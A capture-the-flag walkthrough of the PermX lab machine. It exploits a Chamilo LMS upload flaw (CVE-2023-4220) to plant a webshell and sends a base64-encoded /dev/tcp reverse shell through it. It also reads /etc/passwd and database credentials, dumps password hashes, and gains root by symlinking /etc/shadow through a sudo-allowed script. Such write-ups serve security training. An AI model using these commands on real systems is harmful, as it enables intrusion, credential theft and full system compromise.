#######################################################################
#                             OPERATION: PERMX                        #
#                        STATE-SPONSORED ATTACK                       #
#                                WRITEUP!                             #
#######################################################################

==============================[ NETWORK SCAN ]===============================
nmap - 22,80 ports open

===========================[ DIRECTORY ENUMERATION ]=========================
gobuster 

/img                  (Status: 301) [Size: 304] 
/css                  (Status: 301) [Size: 304] 
/lib                  (Status: 301) [Size: 304] 
/js                   (Status: 301) [Size: 303] 

==========================[ SUBDOMAIN DISCOVERY ]============================
BurpSuite Intruder subdomains hosts top-20.000.txt file

----
Host: §dd§.permx.htb
----

Result: FIND!
_____________

http://lms.permx.htb/

=====================[ EXPLOIT CHAMILO LMS VULNERABILITY ]===================
Target: lms.permx.htb - https://github.com/Rai2en/CVE-2023-4220-Chamilo-LMS

Execution: python3 main.py -u http://lms.permx.htb -a webshell

Access URL: 
http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=ls

Result: WORK!
_______________

==========================[ PAYLOAD CREATION ]===============================
─$ echo "sh -i >& /dev/tcp/your_ip/your_port 0>&1" | base64                             

<base64_encoded_payload>

Execution Command:

echo "<base64_encoded_payload>" | base64 -d | bash

Injection URL:

http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=echo "<base64_encoded_payload>" | base64 -d | bash

Shell Spawn Command:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Status: SUCCESS!

#######################################################################
#                   PRIVILEGE ESCALATION ATTEMPT                      #
#######################################################################

========================[ USER ENUMERATION ]=========================
Command: cat /etc/passwd | grep /bin/bash

Result:

root:x:0:0:root:/root:/bin/bash
mtz:x:1000:1000:mtz:/home/mtz:/bin/bash
_______________________________________________________

=======================[ MYSQL SERVER DETECTION ]=====================
User: www-data

Path: /var/www/html

Command: ss -lt

Result:

State  Recv-Q Send-Q Local Address:Port   Peer Address:PortProcess

LISTEN 0      128          0.0.0.0:ssh         0.0.0.0:*          
LISTEN 0      80         127.0.0.1:mysql       0.0.0.0:*          
LISTEN 0      4096   127.0.0.53%lo:domain      0.0.0.0:*          
LISTEN 0      128             [::]:ssh            [::]:*          
LISTEN 0      511                *:http              *:*  
_______________________________________________________________

=====================[ EXTRACT MYSQL CREDENTIALS ]====================
Command:

cat /var/www/chamilo/app/config/configuration.php | grep db_password
cat /var/www/chamilo/app/config/configuration.php | grep db_user    

Result:

$_configuration['db_password'] = '<mysql_password>';
$_configuration['db_user'] = 'chamilo';

#######################################################################
#                        OPERATION TO BE CONTINUED...                 #
#######################################################################

#########################################################################
                                 CONTINUE
#########################################################################

======================[ CONNECT TO DATABASE ]======================
COMMAND:
mysql -h 127.0.0.1 -P 3306 --user=chamilo --password=<mysql_password>

=======================[ WORK WITH DATABASE ]=======================
# INFORMATION ABOUT TABLE NAMES

SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES 

SOME INTERESTING:

user
admin
user_api_key

======================[ FIND INFORMATION HASH ]=======================
admin - $2y$04$1Ddsofn9mOaa9cbPzk0m6euWcainR.ZT2ts96vRCKrN7CGCmmq4ra
 - $2y$04$wyjp2UVTeiD/jF4OdoYDquf4e7OWi6a3sohKRDe80IHAyihX0ujdS
 
    
 =====================[ HASH TYPE ]=====================
$2y$04$1Ddsofn9mOaa9cbPzk0m6euWcainR.ZT2ts96vRCKrN7CGCmmq4ra - Possible algorithms: bcrypt $2*$, Blowfish (Unix)
 
RESULT: FAILED!
 
#######################################################################
SUCCESS CONNECT TO SSH:
ssh mtz@<ip_address>
password: <mysql_password>

user.txt ---------> <user_flag>

#####################################################
FIND SOME FILES.....
#####################################################

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh
mtz@permx:~$ ls -la /opt/acl.sh 
-rwxr-xr-x 1 root root 419 Jun  5 11:58 /opt/acl.sh

####################################################
ESCALATE LINUX PRIVILEGE 

PROGRAM IS chmod privilege for files without root.

# SO WE CAN DO ln -s FOR SHADOW FILE!

ln -s /etc/shadow shadow
sudo /opt/acl.sh mtz rwx /home/mtz/shadow 
vim /etc/shadow

# SO DO HASH WHAT WE WANT
# AND permit with root!

####################################################
uid=0(root) gid=0(root) groups=0(root)

####################################################
GAME OVER!
